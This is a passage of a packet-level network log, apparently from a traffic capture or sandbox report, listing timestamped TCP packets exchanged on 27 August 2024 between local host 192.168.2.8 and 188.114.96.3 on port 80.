                                Aug 27, 2024 09:49:36.065341949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065372944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065385103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065601110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065612078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065623045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065634966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065646887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065658092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065660000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065670967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065679073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065682888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065700054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065717936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065730095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065748930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065752029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065759897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065773010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065773010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065783978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065809011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065845013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065855026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065857887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065869093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065881968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.065892935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.065917969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066068888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066080093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066091061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066102982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066116095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066127062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066134930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066147089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066149950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066159010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066179037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066183090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066205978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066298962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066312075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066323996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066337109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066344976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066359997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066430092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066467047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066488028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066498995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066528082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066575050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066586018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066597939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066610098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066621065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066689968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066723108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066735029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066745996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066759109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066772938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066780090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066795111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066871881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066886902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066899061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066914082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066917896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066930056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066935062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066941023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066952944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066971064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.066978931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.066984892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067002058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.067029953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.067557096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067603111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067616940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067655087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.067692995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067704916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067715883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067739964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.067795038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067807913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.067835093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067850113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067872047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.067931890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067944050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067955017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067967892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.067970037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.067985058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.068034887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.068073988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.068164110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.068177938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.068190098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.068201065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.068212986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.068223953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.068228006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.068249941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.068321943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.151264906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151283026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151295900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151341915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151354074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151365995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151379108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151398897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.151492119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151510000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151520967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151526928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.151535034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151550055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.151566982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.151567936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151581049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151608944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.151964903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151977062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151988029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.151999950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152012110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152023077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152034998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152050018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152081013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152106047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152120113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152124882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152137041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152148008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152148008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152179003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152179003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152190924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152201891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152213097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152240992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152275085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152287960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152297974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152309895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152323008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152332067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152343988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152380943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152393103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152405977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152417898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152421951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152430058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152447939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152477980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152504921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152637005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152647972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152666092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152678013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152688980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152689934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152700901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152713060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152724981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152736902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152761936 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152795076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.152857065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152870893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152882099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152896881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.152991056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153017998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153029919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153042078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153052092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153070927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153084040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153084993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153096914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153107882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153120995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153125048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153131962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153143883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153147936 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153192043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153368950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153381109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153392076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153403997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153415918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153429985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153449059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153459072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153464079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153548956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153584957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153597116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153609037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153621912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153633118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153635979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153649092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153656960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153661013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153678894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153702974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153877974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153889894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153901100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153934956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153947115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153947115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153960943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153974056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.153976917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.153985977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154000998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.154084921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.154236078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154318094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154330969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154341936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154352903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154364109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.154366970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154386044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.154465914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.154715061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154755116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154767036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154803038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.154891968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154903889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154913902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154930115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154939890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.154943943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.154954910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155035973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155069113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155081034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155092001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155103922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155113935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155117035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155128956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155141115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155155897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155186892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155210018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155221939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155232906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155256987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155263901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155267954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155277014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155288935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155301094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.155318975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.155344963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.238287926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238305092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238322020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238327980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238341093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238353014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238471985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.238528967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238580942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.238667965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238677979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238687992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238706112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238714933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.238746881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.238889933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238908052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238925934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238943100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238955021 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.238960028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238970995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238984108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.238998890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239011049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239023924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239034891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239039898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239053011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239067078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239073992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239085913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239097118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239098072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239106894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239137888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239140987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239150047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239200115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239289045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239304066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239315987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239327908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239348888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239371061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239443064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239650965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239670992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239682913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239692926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239703894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239706039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239722967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239733934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239746094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239757061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239773035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239778996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239784956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239795923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239808083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239814997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239820957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239824057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239833117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239850044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239867926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239870071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239880085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239897013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239907980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239911079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239918947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239931107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239940882 CEST8049715188.114.96.3192.168.2.8
